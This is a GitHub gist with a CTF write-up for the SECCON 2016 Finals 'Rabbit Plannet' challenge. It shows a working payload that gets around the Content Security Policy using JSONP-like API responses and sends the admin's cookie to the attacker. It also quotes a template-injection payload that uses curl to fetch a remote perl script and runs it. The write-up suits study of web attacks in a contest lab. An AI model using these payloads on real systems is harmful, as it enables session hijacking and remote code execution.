Skip to content

Instantly share code, notes, and snippets.

@tyage

tyage/writeup.md

Last active February 4, 2017 04:09
Show Gist options
  • Save tyage/98c90b822a238f9f5e248d06e1ac3842 to your computer and use it in GitHub Desktop.
Save tyage/98c90b822a238f9f5e248d06e1ac3842 to your computer and use it in GitHub Desktop.
Download ZIP
SECCON 2016 Finals 弐(2)
Raw
writeup.md

This chal was not able to solve in day 1 because of admin's mistake. This problem was fixed in day 2.

First step is capturing the flag and second is attacking to flag page (which we should write our team flag).

Capture the flag

Day 1

The provided service is a SNS and we can send messages, write a diary and write to message boards.

@admin says in message boards as below.

description:
        Rabbit Plannet is a simplest and most-secure SNS service.
    
1. @admin:Thu Jan 26 2017 14:07:39 GMT+0000 (UTC)
Hi, all users.
Please discuss about the RabbitPlannet.
2. @nekumon:Thu Jan 26 2017 14:11:10 GMT+0000 (UTC)
Hey, @admin.
> Rabbit Plannet is a simplest and most-secure SNS service.
It's mean "RabbitPlannet is a secure".
hmm... Is that true?
3. @admin:Thu Jan 26 2017 14:22:29 GMT+0000 (UTC)
Hello, @nekumon .

Yes, We do 3 things for the Rabbit Plannet security.
- RabbitPlannet uses "Content Security Policy (CSP)"
- RabbitPlannet's staff(for example, @admin) can only access to RabbitPlannet.
- We uses the newest chromium, We love chromium :)

Of course, We have to be careful SQL injection, Cross Site Scripting, OS Comand execution.
If you notice that security bug, Please tell me.
We watch some messages.

CSP header in http://10.100.2.3 is like that:

Content-Security-Policy:default-src 'self'; script-src 10.100.2.2 'self'; connect-src 10.100.2.2; form-action 'self'; frame-ancestors 'none'

And we found that we can attack admin by XSS when we send messages. So, what we should do is bypassing CSP by creating some valid JavaScript payload with http://10.100.2.2 and http://10.100.2.3.

API server(10.100.2.2) is available which provided some APIs in day 1.

  • /api/me
  • /api/me/messages/{messageID}
  • /api/users/{userID}
  • /activate/{sessionID}

They returns JSON object(e.g. {"id": 123, "title": "message title", ...}) so it is impossible to make a valid payload with these APIs.

Day 2

In day 2, admin says "This chal was not solvable. We fixed this issue by adding some APIs".

We search the differences of the API server and found some new APIs.

  • /api/me/messages
    • It returns: {"messages": {"recieved": "http://10.100.2.2/api/me/messages/recieved?limit=&from=<userid>","transmitted": "http://10.100.2.2/api/me/messages/transmitted?limit=&to=<userid>","<id>": "http://10.100.2.2/api/me/messages/<id>"}}
  • /api/me/messages/recieved
    • It returns received messages by array: [{"id": 123, ...}, {"id": 124, ...}]
  • /api/me/messages/transmitted
    • It returns transmitted messages by array: [{"id": 123, ...}, {"id": 124, ...}]
  • /api/me/messages/{messageID}

So, we can XSS by using /api/me/messages/recieved.

First, I send this payload to admin:

\"}];$(document.signout).attr('action', '/users/99/message/new').append('<input name=title value='+1+'><input name=body value='+document.cookie+'>').submit()//

This payload use signout form to get CSRF token and submit admin's cookie to attacker(user id: 99) as message.

Then if admin look http://10.100.2.2/api/me/messages/recieved?limit=2&from=99, it returns JSON which is executable as JavaScript:

[{"id":1552,"title":"a","body":"\\"}];$(document.signout).attr('action', '/users/99/message/new').append('<input name=title value='+1+'><input name=body value='+document.cookie+'>').submit()//","is_public":true,"created_at":"Sun Jan 29 2017 04:28:27 GMT+0000 (UTC)","updated_at":"Sun Jan 29 2017 04:28:27 GMT+0000 (UTC)","from_id":99,"user_id":1}]

Finally, we send <script src="http://10.100.2.2/api/me/messages/recieved?limit=2&from=99"></script> to admin and get a flag after admin executes our payload.

Admin's cookie:

rabbit_session=63bb77e717f6ae7110554ba2b1129e80724d33c7edf8b712ad4213b6f25fdc1a
```

Flag message:

```
Woooohoooooo!!! You got the admin.
I give a attack flag.

SECCON{3sc@p3_FROM_th3_@nn0y1ng_p3rm1ss10nS}

Enjoy the SECCON!!
```

# Attack to flag page

Admin can edit the contents of top page and this function is vulnerable.

Some other teams already found the vulnerbility and payloads are found.

```
{{ this.constructor.constructor("return process")().mainModule.require("child_process").exec("curl 192.168.8.8/bc.pl | perl -") }} ble {{ this.constructor.constructor("return process")().mainModule.require("fs")}}
```

OK. There are template injection vulnerbility.

What we do is to write our team flag to `/app/public/attack/attack.txt`.
But there is only one hour left before the game ends and chal server is down because of so many attacks.
So, we can't take any defence point with this challenge.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment